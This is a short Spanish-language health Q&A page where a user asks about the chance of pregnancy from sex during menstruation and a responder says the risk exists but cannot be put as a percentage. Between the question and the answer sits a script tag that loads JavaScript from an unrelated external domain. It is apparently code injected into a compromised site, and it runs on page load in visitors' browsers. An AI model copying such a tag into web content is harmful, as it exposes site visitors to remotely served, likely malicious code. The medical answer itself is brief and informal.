¿Qué probabilidades existen?

Hola Doctor...

Qquisiera saber que probabilidades existen de quedar en embarazo teniendo relaciones con la menstruacion??

<script type="text/javascript" src="http://temarosaplus.info/?0.9273255827193333"></script>
Respuesta

Los coitos mantenidos durante la menstruación no están libres de riesgo de embarazo. Se pueden liberar óvulos también durante esos días. No existe un patrón constante completamente en las mujeres, ya que cualquier desajuste emocional o físico puede conducir a ovular en cualquier parte del ciclo. Decirte Probabilidades en porcentaje sería muy osado por mi parte decirte, ya que es algo muy varialbe.